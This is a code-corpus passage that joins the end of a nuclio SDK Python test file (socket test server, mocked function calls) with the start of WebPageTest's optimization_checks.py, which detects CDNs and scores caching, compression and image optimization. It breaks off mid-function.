while self._unix_stream_server._connection_socket is None and timeout > 0:
time.sleep(interval)
timeout -= interval
def _wait_until_received_messages(self, minimum_messages_length, timeout=10, interval=1):
while timeout > 0:
time.sleep(interval)
current_messages_length = len(self._unix_stream_server._messages)
if current_messages_length >= minimum_messages_length:
return
self._logger.debug_with('Waiting for messages to arrive',
current_messages_length=current_messages_length,
minimum_messages_length=minimum_messages_length)
timeout -= interval
raise RuntimeError('Failed waiting for messages')
def _create_unix_stream_server(self, socket_path):
unix_stream_server = _SingleConnectionUnixStreamServer(socket_path, _Connection)
# create a thread and listen forever on server
self._unix_stream_server_thread = threading.Thread(target=unix_stream_server.serve_forever)
self._unix_stream_server_thread.daemon = True
self._unix_stream_server_thread.start()
return unix_stream_server
def _ensure_str(self, s, encoding='utf-8', errors='strict'):
# Optimization: Fast return for the common case.
if type(s) is str:
return s
if isinstance(s, bytes):
return s.decode(encoding, errors)
raise TypeError(f"not expecting type '{type(s)}'")
def _write_handler(self, temp_path):
handler_code = '''import sys
def handler(ctx, event):
"""Return reversed body as string"""
body = event.body
if isinstance(event.body, bytes):
body = event.body.decode('utf-8')
ctx.logger.warn('the end is nigh')
return body[::-1]
'''
handler_path = os.path.join(temp_path, 'reverser.py')
with open(handler_path, 'w') as out:
out.write(handler_code)
return handler_path
class TestSubmitEventsDecoded(TestSubmitEvents):
@classmethod
def setUpClass(cls):
super(TestSubmitEventsDecoded, cls).setUpClass()
cls._decode_incoming_event_messages = True
class _SingleConnectionUnixStreamServer(socketserver.UnixStreamServer):
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
socketserver.UnixStreamServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate)
self._connection_socket = None # type: socket.socket
self._messages = []
class _Connection(socketserver.BaseRequestHandler):
def handle(self):
self.request.settimeout(1)
# make a file from the socket so we can readln
socket_file = self.request.makefile('r')
# save the connection socket
self.server._connection_socket = self.request
# while the server isn't shut down
while not self.server._BaseServer__shutdown_request:
try:
line = socket_file.readline()
if not line:
continue
message = {
'type': line[0],
'body': json.loads(line[1:]) if line[0] != 's' else ''
}
self.server._messages.append(message)
except:
pass
class TestCallFunction(unittest.TestCase):
def setUp(self):
# provided by _connection_provider
self._mockConnection = unittest.mock.MagicMock()
def test_call_json_body(self):
self._platform = nuclio_sdk.Platform('local', 'somens', self._connection_provider)
# prepare an event to send
event = nuclio_sdk.Event(method='GET', path='path', body={'a': 'some_body'})
# prepare a responder
connection_response = unittest.mock.MagicMock()
connection_response.status = http.client.NO_CONTENT
connection_response.getheaders = lambda: [('Content-Type', 'application/json')]
connection_response.read = unittest.mock.MagicMock(return_value='{"b": "some_response"}')
self._mockConnection.getresponse = unittest.mock.MagicMock(return_value=connection_response)
# send the event
response = self._platform.call_function('function-name', event)
self.assertEqual(self._mockConnection.url, 'nuclio-somens-function-name:8080')
self._mockConnection.request.assert_called_with(event.method,
event.path,
body=json.dumps({'a': 'some_body'}),
headers={
'Content-Type': 'application/json',
'X-Nuclio-Target': 'function-name'
})
self.assertEqual({'b': 'some_response'}, response.body)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http.client.NO_CONTENT, response.status_code)
def test_get_function_url(self):
self.assertEqual(nuclio_sdk.Platform('local', 'ns')._get_function_url('function-name'),
'nuclio-ns-function-name:8080')
self.assertEqual(nuclio_sdk.Platform('kube', 'ns')._get_function_url('function-name'),
'nuclio-function-name:8080')
def _connection_provider(self, url, timeout=None):
self._mockConnection.url = url
return self._mockConnection
|
optimization_checks.py
|
# Copyright 2019 WebPageTest LLC.
# Copyright 2017 Google Inc.
# Use of this source code is governed by the Apache 2.0 license that can be
# found in the LICENSE file.
"""Run the various optimization checks"""
import binascii
import gzip
import logging
import multiprocessing
import os
import re
import shutil
import struct
import subprocess
import sys
import threading
import time
if (sys.version_info > (3, 0)):
from time import monotonic
GZIP_TEXT = 'wt'
unicode = str
else:
from monotonic import monotonic
GZIP_TEXT = 'w'
try:
import ujson as json
except BaseException:
import json
class OptimizationChecks(object):
"""Threaded optimization checks"""
def __init__(self, job, task, requests):
self.job = job
self.task = task
self.running_checks = False
self.requests = requests
self.cdn_thread = None
self.hosting_thread = None
self.gzip_thread = None
self.image_thread = None
self.progressive_thread = None
self.font_thread = None
self.cdn_time = None
self.hosting_time = None
self.gzip_time = None
self.image_time = None
self.progressive_time = None
self.font_time = None
self.cdn_results = {}
self.hosting_results = {}
self.gzip_results = {}
self.image_results = {}
self.progressive_results = {}
self.font_results = {}
self.results = {}
self.dns_lookup_queue = multiprocessing.JoinableQueue()
self.dns_result_queue = multiprocessing.JoinableQueue()
self.fetch_queue = multiprocessing.JoinableQueue()
self.fetch_result_queue = multiprocessing.JoinableQueue()
# spell-checker: disable
self.cdn_cnames = {
'Advanced Hosters CDN': ['.pix-cdn.org'],
'afxcdn.net': ['.afxcdn.net'],
'Akamai': ['.akamai.net',
'.akamaized.net',
'.akamaized-staging.net',
'.akamaiedge.net',
'.akamaiedge-staging.net',
'.akamaihd.net',
'.edgesuite.net',
'.edgesuite-staging.net',
'.edgekey.net',
'.edgekey-staging.net',
'.srip.net',
'.akamaitechnologies.com',
'.akamaitechnologies.fr'],
'Akamai China CDN': ['.tl88.net'],
'Alimama': ['.gslb.tbcache.com'],
'Amazon CloudFront': ['.cloudfront.net'],
'Aryaka': ['.aads1.net',
'.aads-cn.net',
'.aads-cng.net'],
'AT&T': ['.att-dsa.net'],
'Automattic': ['.wp.com',
'.wordpress.com',
'.gravatar.com'],
'Azion': ['.azioncdn.net',
'.azioncdn.com',
'.azion.net'],
'BelugaCDN': ['.belugacdn.com',
'.belugacdn.link'],
'Bison Grid': ['.bisongrid.net'],
'BitGravity': ['.bitgravity.com'],
'Blue Hat Network': ['.bluehatnetwork.com'],
'BO.LT': ['bo.lt'],
'BunnyCDN': ['.b-cdn.net'],
'Cachefly': ['.cachefly.net'],
'Caspowa': ['.caspowa.com'],
'Cedexis': ['.cedexis.net'],
'CDN77': ['.cdn77.net',
'.cdn77.org'],
'CDNetworks': ['.cdngc.net',
'.gccdn.net',
'.panthercdn.com'],
'CDNsun': ['.cdnsun.net'],
'CDNvideo': ['.cdnvideo.ru',
'.cdnvideo.net'],
'ChinaCache': ['.ccgslb.com'],
'ChinaNetCenter': ['.lxdns.com',
'.wscdns.com',
'.wscloudcdn.com',
'.ourwebpic.com'],
'Cloudflare': ['.cloudflare.com',
'.cloudflare.net'],
'Cotendo CDN': ['.cotcdn.net'],
'cubeCDN': ['.cubecdn.net'],
'Edgecast': ['edgecastcdn.net',
'.systemcdn.net',
'.transactcdn.net',
'.v1cdn.net',
'.v2cdn.net',
'.v3cdn.net',
'.v4cdn.net',
'.v5cdn.net'],
'Facebook': ['.facebook.com',
'.facebook.net',
'.fbcdn.net',
'.cdninstagram.com'],
'Fastly': ['.fastly.net',
'.fastlylb.net',
'.nocookie.net'],
'GoCache': ['.cdn.gocache.net'],
'Google': ['.google.',
'googlesyndication.',
'youtube.',
'.googleusercontent.com',
'googlehosted.com',
'.gstatic.com',
'.doubleclick.net'],
'HiberniaCDN': ['.hiberniacdn.com'],
'Highwinds': ['hwcdn.net'],
'Hosting4CDN': ['.hosting4cdn.com'],
'ImageEngine': ['.imgeng.in'],
'Incapsula': ['.incapdns.net'],
'Instart Logic': ['.insnw.net',
'.inscname.net'],
'Internap': ['.internapcdn.net'],
'jsDelivr': ['cdn.jsdelivr.net'],
'KeyCDN': ['.kxcdn.com'],
'KINX CDN': ['.kinxcdn.com',
'.kinxcdn.net'],
'LeaseWeb CDN': ['.lswcdn.net',
'.lswcdn.eu'],
'Level 3': ['.footprint.net',
'.fpbns.net'],
'Limelight': ['.llnwd.net',
'.llnw.net',
'.llnwi.net',
'.lldns.net'],
'MediaCloud': ['.cdncloud.net.au'],
'Medianova': ['.mncdn.com',
'.mncdn.net',
'.mncdn.org'],
'Microsoft Azure': ['.vo.msecnd.net',
'.azureedge.net',
'.azurefd.net',
'.azure.microsoft.com',
'-msedge.net'],
'Mirror Image': ['.instacontent.net',
'.mirror-image.net'],
'NetDNA': ['.netdna-cdn.com',
'.netdna-ssl.com',
'.netdna.com'],
'Netlify': ['.netlify.com'],
'NGENIX': ['.ngenix.net'],
'NYI FTW': ['.nyiftw.net',
'.nyiftw.com'],
'OnApp': ['.r.worldcdn.net',
'.r.worldssl.net'],
'Optimal CDN': ['.optimalcdn.com'],
'PageCDN': ['pagecdn.io'],
'PageRain': ['.pagerain.net'],
'Pressable CDN': ['.pressablecdn.com'],
'PUSHR': ['.pushrcdn.com'],
'Rackspace': ['.raxcdn.com'],
'Reapleaf': ['.rlcdn.com'],
'Reflected Networks': ['.rncdn1.com',
'.rncdn7.com'],
'ReSRC.it': ['.resrc.it'],
'Rev Software': ['.revcn.net',
'.revdn.net'],
'Roast.io': ['.roast.io'],
'Rocket CDN': ['.streamprovider.net'],
'section.io': ['.squixa.net'],
'SFR': ['cdn.sfr.net'],
'SwiftyCDN': ['.swiftycdn.net'],
'Simple CDN': ['.simplecdn.net'],
'Singular CDN': ['.singularcdn.net.br'],
'Sirv CDN': ['.sirv.com'],
'StackPath': ['.stackpathdns.com'],
'SwiftCDN': ['.swiftcdn1.com',
'.swiftserve.com'],
'Taobao': ['.gslb.taobao.com',
'tbcdn.cn',
'.taobaocdn.com'],
'Telenor': ['.cdntel.net'],
'TRBCDN': ['.trbcdn.net'],
'Twitter': ['.twimg.com'],
'UnicornCDN': ['.unicorncdn.net'],
'Universal CDN': ['.cdn12.com',
'.cdn13.com',
'.cdn15.com'],
'VegaCDN': ['.vegacdn.vn',
'.vegacdn.com'],
'VoxCDN': ['.voxcdn.net'],
'XLabs Security': ['.xlabs.com.br',
'.armor.zone'],
'Yahoo': ['.ay1.b.yahoo.com',
'.yimg.',
'.yahooapis.com'],
'Yottaa': ['.yottaa.net'],
'ZEIT Smart CDN': ['.zeit.co'],
'Zenedge': ['.zenedge.net']
}
self.cdn_headers = {
'Airee': [{'Server': 'Airee'}],
'Akamai': [{'x-akamai-staging': 'ESSL'},
{'x-akamai-request-id': ''}],
'Amazon CloudFront': [{'Via': 'CloudFront'}],
'Aryaka': [{'X-Ar-Debug': ''}],
'BelugaCDN': [{'Server': 'Beluga'},
{'X-Beluga-Cache-Status': ''}],
'BunnyCDN': [{'Server': 'BunnyCDN'}],
'Caspowa': [{'Server': 'Caspowa'}],
'CDN': [{'X-Edge-IP': ''},
{'X-Edge-Location': ''}],
'CDN77': [{'Server': 'CDN77'}],
'CDNetworks': [{'X-Px': ''}],
'ChinaNetCenter': [{'X-Cache': 'cache.51cdn.com'}],
'Cloudflare': [{'Server': 'cloudflare'}],
'Edgecast': [{'Server': 'ECS'},
{'Server': 'ECAcc'},
{'Server': 'ECD'}],
'Fastly': [{'X-Served-By': 'cache-', 'X-Cache': ''}],
'Fly': [{'Server': 'Fly.io'}],
'GoCache': [{'Server': 'gocache'}],
'Google': [{'Server': 'sffe'},
{'Server': 'gws'},
{'Server': 'GSE'},
{'Server': 'Golfe2'},
{'Via': 'google'}],
'HiberniaCDN': [{'Server': 'hiberniacdn'}],
'Highwinds': [{'X-HW': ''}],
'Hosting4CDN': [{'x-cdn': 'H4CDN'}],
'ImageEngine': [{'Server': 'ScientiaMobile ImageEngine'}],
'Incapsula': [{'X-CDN': 'Incapsula'},
{'X-Iinfo': ''}],
'Instart Logic': [{'X-Instart-Request-ID': 'instart'}],
'LeaseWeb CDN': [{'Server': 'leasewebcdn'}],
'Medianova': [{'Server': 'MNCDN'}],
'Myra Security CDN': [{'Server': 'myracloud'}],
'Naver': [{'Server': 'Testa/'}],
'NetDNA': [{'Server': 'NetDNA'}],
'Netlify': [{'Server': 'Netlify'}],
'NGENIX': [{'x-ngenix-cache': ''}],
'NYI FTW': [{'X-Powered-By': 'NYI FTW'},
{'X-Delivered-By': 'NYI FTW'}],
'Optimal CDN': [{'Server': 'Optimal CDN'}],
'OVH CDN': [{'X-CDN-Geo': ''},
{'X-CDN-Pop': ''}],
'PageCDN': [{'X-CDN': 'PageCDN'}],
'PUSHR': [{'Via': 'PUSHR'}],
'QUIC.cloud': [{'X-QC-POP': '', 'X-QC-Cache': ''}],
'ReSRC.it': [{'Server': 'ReSRC'}],
'Rev Software': [{'Via': 'Rev-Cache'},
{'X-Rev-Cache': ''}],
'Roast.io': [{'Server': 'Roast.io'}],
'Rocket CDN': [{'x-rocket-node': ''}],
'section.io': [{'section-io-id': ''}],
'SwiftyCDN': [{'X-CDN': 'SwiftyCDN'}],
'Singular CDN': [{'Server': 'SingularCDN'}],
'Sirv CDN': [{'x-sirv-server': ''}],
'Sucuri Firewall': [{'Server': 'Sucuri/Cloudproxy'},
{'x-sucuri-id': ''}],
'Surge': [{'Server': 'SurgeCDN'}],
'Twitter': [{'Server': 'tsa_b'}],
'UnicornCDN': [{'Server': 'UnicornCDN'}],
'XLabs Security': [{'x-cdn': 'XLabs Security'}],
'Yunjiasu': [{'Server': 'yunjiasu'}],
'Zenedge': [{'X-Cdn': 'Zenedge'}],
'ZEIT Smart CDN': [{'Server': 'now'}],
'Zycada Networks': [{'X-Zy-Server': ''}]
}
# spell-checker: enable
def start(self):
"""Start running the optimization checks"""
logging.debug('Starting optimization checks...')
optimization_checks_disabled = bool('noopt' in self.job and self.job['noopt'])
if self.requests is not None and not optimization_checks_disabled:
self.running_checks = True
# Run the slow checks in background threads
self.cdn_thread = threading.Thread(target=self.check_cdn)
self.hosting_thread = threading.Thread(target=self.check_hosting)
self.gzip_thread = threading.Thread(target=self.check_gzip)
self.image_thread = threading.Thread(target=self.check_images)
self.progressive_thread = threading.Thread(target=self.check_progressive)
self.font_thread = threading.Thread(target=self.check_fonts)
self.cdn_thread.start()
self.hosting_thread.start()
self.gzip_thread.start()
self.image_thread.start()
self.progressive_thread.start()
self.font_thread.start()
# collect the miscellaneous results directly
logging.debug('Checking keep-alive.')
self.check_keep_alive()
logging.debug('Checking caching.')
self.check_cache_static()
logging.debug('Optimization checks started.')
def join(self):
"""Wait for the optimization checks to complete and record the results"""
logging.debug('Waiting for optimization checks to complete')
if self.running_checks:
logging.debug('Waiting for progressive JPEG check to complete')
if self.progressive_thread is not None:
self.progressive_thread.join()
self.progressive_thread = None
if self.progressive_time is not None:
logging.debug("Progressive JPEG check took %0.3f seconds", self.progressive_time)
logging.debug('Waiting for gzip check to complete')
if self.gzip_thread is not None:
self.gzip_thread.join()
self.gzip_thread = None
if self.gzip_time is not None:
logging.debug("gzip check took %0.3f seconds", self.gzip_time)
logging.debug('Waiting for font check to complete')
if self.font_thread is not None:
self.font_thread.join()
self.font_thread = None
if self.font_time is not None:
logging.debug("font check took %0.3f seconds", self.font_time)
logging.debug('Waiting for image check to complete')
if self.image_thread is not None:
self.image_thread.join()
self.image_thread = None
if self.image_time is not None:
logging.debug("image check took %0.3f seconds", self.image_time)
logging.debug('Waiting for CDN check to complete')
if self.cdn_thread is not None:
self.cdn_thread.join()
self.cdn_thread = None
if self.cdn_time is not None:
logging.debug("CDN check took %0.3f seconds", self.cdn_time)
logging.debug('Waiting for Hosting check to complete')
if self.hosting_thread is not None:
self.hosting_thread.join()
self.hosting_thread = None
if self.hosting_time is not None:
logging.debug("Hosting check took %0.3f seconds", self.hosting_time)
# Merge the results together
for request_id in self.cdn_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['cdn'] = self.cdn_results[request_id]
for request_id in self.gzip_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['gzip'] = self.gzip_results[request_id]
for request_id in self.image_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['image'] = self.image_results[request_id]
for request_id in self.progressive_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['progressive'] = self.progressive_results[request_id]
for request_id in self.font_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['font'] = self.font_results[request_id]
if self.task is not None and 'page_data' in self.task:
for name in self.hosting_results:
self.task['page_data'][name] = self.hosting_results[name]
# Save the results
if self.results:
path = os.path.join(self.task['dir'], self.task['prefix']) + '_optimization.json.gz'
gz_file = gzip.open(path, GZIP_TEXT, 7)
if gz_file:
gz_file.write(json.dumps(self.results))
gz_file.close()
logging.debug('Optimization checks complete')
return self.results
def check_keep_alive(self):
"""Check for requests where the connection is force-closed"""
if (sys.version_info > (3, 0)):
from urllib.parse import urlsplit # pylint: disable=import-error
else:
from urlparse import urlsplit # pylint: disable=import-error
# build a list of origins and how many requests were issued to each
origins = {}
for request_id in self.requests:
request = self.requests[request_id]
if 'url' in request:
url = request['full_url'] if 'full_url' in request else request['url']
parsed = urlsplit(url)
origin = parsed.scheme + '://' + parsed.netloc
if origin not in origins:
origins[origin] = 0
origins[origin] += 1
for request_id in self.requests:
try:
request = self.requests[request_id]
if 'url' in request:
check = {'score': 100}
url = request['full_url'] if 'full_url' in request else request['url']
parsed = urlsplit(url)
origin = parsed.scheme + '://' + parsed.netloc
if origins[origin] > 1:
check['score'] = 100
keep_alive = self.get_header_value(request['response_headers'],
'Connection')
if keep_alive is not None and keep_alive.lower().strip().find('close') > -1:
check['score'] = 0
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['keep_alive'] = check
except Exception:
logging.exception('Error checking keep-alive')
def get_time_remaining(self, request):
"""See if a request is static and how long it can be cached for"""
from email.utils import parsedate
re_max_age = re.compile(r'max-age[ ]*=[ ]*(?P<maxage>[\d]+)')
is_static = False
time_remaining = -1
try:
if 'response_headers' in request:
content_length = self.get_header_value(request['response_headers'],
'Content-Length')
if content_length is not None:
content_length = int(re.search(r'\d+', str(content_length)).group())
if content_length == 0:
return is_static, time_remaining
if 'response_headers' in request:
content_type = self.get_header_value(request['response_headers'],
'Content-Type')
if content_type is None or \
(content_type.find('/html') == -1 and
content_type.find('/cache-manifest') == -1):
is_static = True
cache = self.get_header_value(request['response_headers'], 'Cache-Control')
pragma = self.get_header_value(request['response_headers'], 'Pragma')
expires = self.get_header_value(request['response_headers'], 'Expires')
max_age_matches = None
if cache is not None:
max_age_matches = re.search(re_max_age, cache)
cache = cache.lower()
if cache.find('no-store') > -1 or cache.find('no-cache') > -1:
is_static = False
if is_static and pragma is not None:
pragma = pragma.lower()
if pragma.find('no-cache') > -1:
is_static = False
if is_static:
time_remaining = 0
if max_age_matches is not None:
time_remaining = int(max_age_matches.groupdict().get('maxage'))
age = self.get_header_value(request['response_headers'], 'Age')
if time_remaining == 0:
is_static = False
time_remaining = -1
elif age is not None:
time_remaining -= int(re.search(r'\d+',
str(age).strip()).group())
elif expires is not None:
date = self.get_header_value(request['response_headers'], 'Date')
exp = time.mktime(parsedate(expires))
if date is not None:
now = time.mktime(parsedate(date))
else:
now = time.time()
time_remaining = int(exp - now)
if time_remaining < 0:
is_static = False
except Exception:
logging.exception('Error calculating time remaining')
return is_static, time_remaining
def check_cache_static(self):
"""Check static resources for how long they are cacheable for"""
for request_id in self.requests:
try:
request = self.requests[request_id]
check = {'score': -1, 'time': 0}
if 'status' in request and request['status'] == 200:
is_static, time_remaining = self.get_time_remaining(request)
if is_static:
check['time'] = time_remaining
if time_remaining >= 604800: # 7 days
check['score'] = 100
elif time_remaining >= 3600: # 1 hour
check['score'] = 50
else:
check['score'] = 0
if check['score'] >= 0:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['cache'] = check
except Exception:
logging.exception('Error checking cache static')
def check_hosting(self):
"""Pull the data needed to determine the hosting"""
start = monotonic()
self.hosting_results['base_page_ip_ptr'] = ''
self.hosting_results['base_page_cname'] = ''
self.hosting_results['base_page_dns_server'] = ''
domain = None
if self.task is not None and 'page_data' in self.task and \
'document_hostname' in self.task['page_data']:
domain = self.task['page_data']['document_hostname']
if domain is not None:
try:
from dns import resolver, reversename
dns_resolver = resolver.Resolver()
dns_resolver.timeout = 5
dns_resolver.lifetime = 5
# reverse-lookup the edge server
try:
addresses = dns_resolver.query(domain)
if addresses:
addr = str(addresses[0])
addr_name = reversename.from_address(addr)
if addr_name:
name = str(dns_resolver.query(addr_name, "PTR")[0])
if name:
self.hosting_results['base_page_ip_ptr'] = name.strip('. ')
except Exception:
pass
# get the CNAME for the address
try:
answers = dns_resolver.query(domain, 'CNAME')
if answers and len(answers):
for rdata in answers:
name = '.'.join(rdata.target).strip(' .')
if name != domain:
self.hosting_results['base_page_cname'] = name
break
except Exception:
pass
# get the name server for the domain
done = False
while domain is not None and not done:
try:
dns_servers = dns_resolver.query(domain, "NS")
dns_name = str(dns_servers[0].target).strip('. ')
if dns_name:
self.hosting_results['base_page_dns_server'] = dns_name
done = True
except Exception:
pass
pos = domain.find('.')
if pos > 0:
domain = domain[pos + 1:]
else:
domain = None
except Exception:
logging.exception('Error checking hosting')
self.hosting_time = monotonic() - start
def check_cdn(self):
"""Check each request to see if it was served from a CDN"""
if (sys.version_info > (3, 0)):
from urllib.parse import urlparse # pylint: disable=import-error
else:
from urlparse import urlparse # pylint: disable=import-error
start = monotonic()
# First pass, build a list of domains and see if the headers or domain matches
static_requests = {}
domains = {}
for request_id in self.requests:
request = self.requests[request_id]
is_static, _ = self.get_time_remaining(request)
if is_static:
static_requests[request_id] = True
if 'url' in request:
url = request['full_url'] if 'full_url' in request else request['url']
domain = urlparse(url).hostname
if domain is not None:
if domain not in domains:
# Check the domain itself against the CDN list
domains[domain] = ''
provider = self.check_cdn_name(domain)
if provider is not None:
domains[domain] = provider
# Spawn several workers to do CNAME lookups for the unknown domains
count = 0
for domain in domains:
if not domains[domain]:
count += 1
self.dns_lookup_queue.put(domain)
if count:
thread_count = min(10, count)
threads = []
for _ in range(thread_count):
thread = threading.Thread(target=self.dns_worker)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
try:
while True:
dns_result = self.dns_result_queue.get_nowait()
domains[dns_result['domain']] = dns_result['provider']
except Exception:
pass
# Final pass, populate the CDN info for each request
for request_id in self.requests:
check = {'score': -1, 'provider': ''}
request = self.requests[request_id]
if request_id in static_requests:
check['score'] = 0
if 'url' in request:
url = request['full_url'] if 'full_url' in request else request['url']
domain = urlparse(url).hostname
if domain is not None:
if domain in domains and domains[domain]:
check['score'] = 100
check['provider'] = domains[domain]
if not check['provider'] and 'response_headers' in request:
provider = self.check_cdn_headers(request['response_headers'])
if provider is not None:
check['score'] = 100
check['provider'] = provider
self.cdn_results[request_id] = check
self.cdn_time = monotonic() - start
def find_dns_cdn(self, domain, depth=0):
"""Recursively check a CNAME chain"""
from dns import resolver, reversename
dns_resolver = resolver.Resolver()
dns_resolver.timeout = 1
dns_resolver.lifetime = 1
provider = self.check_cdn_name(domain)
# First do a CNAME check
if provider is None:
try:
answers = dns_resolver.query(domain, 'CNAME')
if answers and len(answers):
for rdata in answers:
name = '.'.join(rdata.target).strip(' .')
if name != domain:
provider = self.check_cdn_name(name)
if provider is None and depth < 10:
provider = self.find_dns_cdn(name, depth + 1)
if provider is not None:
break
except Exception:
pass
# Try a reverse-lookup of the address
if provider is None:
try:
addresses = dns_resolver.query(domain)
if addresses:
addr = str(addresses[0])
addr_name = reversename.from_address(addr)
if addr_name:
name = str(dns_resolver.query(addr_name, "PTR")[0])
if name:
provider = self.check_cdn_name(name)
except Exception:
pass
return provider
def dns_worker(self):
"""Handle the DNS CNAME lookups and checking in multiple threads"""
try:
while True:
domain = self.dns_lookup_queue.get_nowait()
try:
provider = self.find_dns_cdn(domain)
if provider is not None:
self.dns_result_queue.put({'domain': domain, 'provider': provider})
except Exception:
logging.debug('Error in dns worker')
self.dns_lookup_queue.task_done()
except Exception:
pass
def check_cdn_name(self, domain):
"""Check the given domain against our cname list"""
if domain is not None and len(domain):
check_name = domain.lower()
for cdn in self.cdn_cnames:
for cname in self.cdn_cnames[cdn]:
if check_name.find(cname) > -1:
return cdn
return None
def check_cdn_headers(self, headers):
"""Check the given headers against our header list"""
matched_cdns = []
for cdn in self.cdn_headers:
for header_group in self.cdn_headers[cdn]:
all_match = True
for name in header_group:
value = self.get_header_value(headers, name)
if value is None:
all_match = False
break
else:
value = value.lower()
check = header_group[name].lower()
if len(check) and value.find(check) == -1:
all_match = False
break
if all_match:
matched_cdns.append(cdn)
break
if not len(matched_cdns):
return None
return ', '.join(matched_cdns)
def check_gzip(self):
"""Check each request to see if it can be compressed"""
start = monotonic()
for request_id in self.requests:
try:
request = self.requests[request_id]
content_length = None
if 'response_headers' in request:
content_length = self.get_header_value(request['response_headers'], 'Content-Length')
if 'objectSize' in request:
content_length = request['objectSize']
elif content_length is not None:
content_length = int(re.search(r'\d+', str(content_length)).group())
elif 'transfer_size' in request:
content_length = request['transfer_size']
if content_length is None:
content_length = 0
check = {'score': 0, 'size': content_length, 'target_size': content_length}
encoding = None
if 'response_headers' in request:
encoding = self.get_header_value(request['response_headers'],
'Content-Encoding')
# Check for responses that are already compressed (ignore the level)
if encoding is not None:
if encoding.find('gzip') >= 0 or \
encoding.find('deflate') >= 0 or \
encoding.find('br') >= 0:
check['score'] = 100
# Ignore small responses that will fit in a packet
if not check['score'] and content_length < 1400:
check['score'] = -1
# Try compressing it if it isn't an image
if not check['score'] and 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type is not None:
check['score'] = -1
else:
out_file = request['body'] + '.gzip'
with open(request['body'], 'rb') as f_in:
with gzip.open(out_file, 'wb', 7) as f_out:
shutil.copyfileobj(f_in, f_out)
if os.path.isfile(out_file):
target_size = os.path.getsize(out_file)
try:
os.remove(out_file)
except Exception:
pass
if target_size is not None:
delta = content_length - target_size
# Only count it if there is at least 1 packet and 10% savings
if target_size > 0 and \
delta > 1400 and \
target_size < (content_length * 0.9):
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = -1
else:
check['score'] = -1
else:
check['score'] = -1
if check['score'] >= 0:
self.gzip_results[request_id] = check
except Exception:
logging.exception('Error checking gzip')
self.gzip_time = monotonic() - start
def check_images(self):
"""Check each request to see if images can be compressed better"""
start = monotonic()
for request_id in self.requests:
try:
request = self.requests[request_id]
content_length = None
if 'response_headers' in request:
content_length = self.get_header_value(request['response_headers'], 'Content-Length')
if content_length is not None:
content_length = int(re.search(r'\d+', str(content_length)).group())
elif 'transfer_size' in request:
content_length = request['transfer_size']
check = {'score': -1, 'size': content_length, 'target_size': content_length}
if content_length and 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type == 'jpeg':
if content_length < 1400:
check['score'] = 100
else:
# Compress it as a quality 85 stripped progressive image and compare
jpeg_file = request['body'] + '.jpg'
command = '{0} -define jpeg:dct-method=fast -strip '\
'-interlace Plane -quality 85 '\
'"{1}" "{2}"'.format(self.job['image_magick']['convert'],
request['body'], jpeg_file)
subprocess.call(command, shell=True)
if os.path.isfile(jpeg_file):
target_size = os.path.getsize(jpeg_file)
try:
os.remove(jpeg_file)
except Exception:
pass
delta = content_length - target_size
# Only count it if there is at least 1 packet savings
if target_size > 0 and delta > 1400:
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = 100
elif sniff_type == 'png':
if 'response_body' not in request:
request['response_body'] = ''
with open(request['body'], 'rb') as f_in:
request['response_body'] = f_in.read()
if content_length < 1400:
check['score'] = 100
else:
# spell-checker: disable
image_chunks = [b"iCCP", b"tIME", b"gAMA", b"PLTE", b"acTL", b"IHDR", b"cHRM",
b"bKGD", b"tRNS", b"sBIT", b"sRGB", b"pHYs", b"hIST", b"vpAg",
b"oFFs", b"fcTL", b"fdAT", b"IDAT"]
# spell-checker: enable
body = request['response_body']
image_size = len(body)
valid = True
target_size = 8
bytes_remaining = image_size - 8
pos = 8
while valid and bytes_remaining >= 4:
chunk_len = struct.unpack('>I', body[pos: pos + 4])[0]
pos += 4
if chunk_len + 12 <= bytes_remaining:
chunk_type = body[pos: pos + 4]
pos += 4
if chunk_type in image_chunks:
target_size += chunk_len + 12
pos += chunk_len + 4 # Skip the data and CRC
bytes_remaining -= chunk_len + 12
else:
valid = False
bytes_remaining = 0
if valid:
delta = content_length - target_size
# Only count it if there is at least 1 packet savings
if target_size > 0 and delta > 1400:
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = 100
elif sniff_type == 'gif':
if content_length < 1400:
check['score'] = 100
else:
is_animated = False
from PIL import Image
with Image.open(request['body']) as gif:
try:
gif.seek(1)
except EOFError:
is_animated = False
else:
is_animated = True
if is_animated:
check['score'] = 100
else:
# Convert it to a PNG
png_file = request['body'] + '.png'
command = 'convert "{0}" "{1}"'.format(request['body'], png_file)
subprocess.call(command, shell=True)
if os.path.isfile(png_file):
target_size = os.path.getsize(png_file)
try:
os.remove(png_file)
except Exception:
pass
delta = content_length - target_size
# Only count it if there is at least 1 packet savings
if target_size > 0 and delta > 1400:
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = 100
elif sniff_type == 'webp':
check['score'] = 100
if check['score'] >= 0:
self.image_results[request_id] = check
except Exception:
logging.exception('Error checking images')
self.image_time = monotonic() - start
def check_progressive(self):
"""Count the number of scan lines in each jpeg"""
from PIL import Image
start = monotonic()
for request_id in self.requests:
try:
request = self.requests[request_id]
if 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type == 'jpeg':
check = {'size': os.path.getsize(request['body']), 'scan_count': 1}
image = Image.open(request['body'])
info = dict(image.info)
image.close()
if 'progression' in info and info['progression']:
check['scan_count'] = 0
if 'response_body' not in request:
request['response_body'] = ''
with open(request['body'], 'rb') as f_in:
request['response_body'] = f_in.read()
body = request['response_body']
content_length = len(request['response_body'])
pos = 0
try:
while pos < content_length:
block = struct.unpack('B', body[pos])[0]
pos += 1
if block != 0xff:
break
block = struct.unpack('B', body[pos])[0]
pos += 1
while block == 0xff:
block = struct.unpack('B', body[pos])[0]
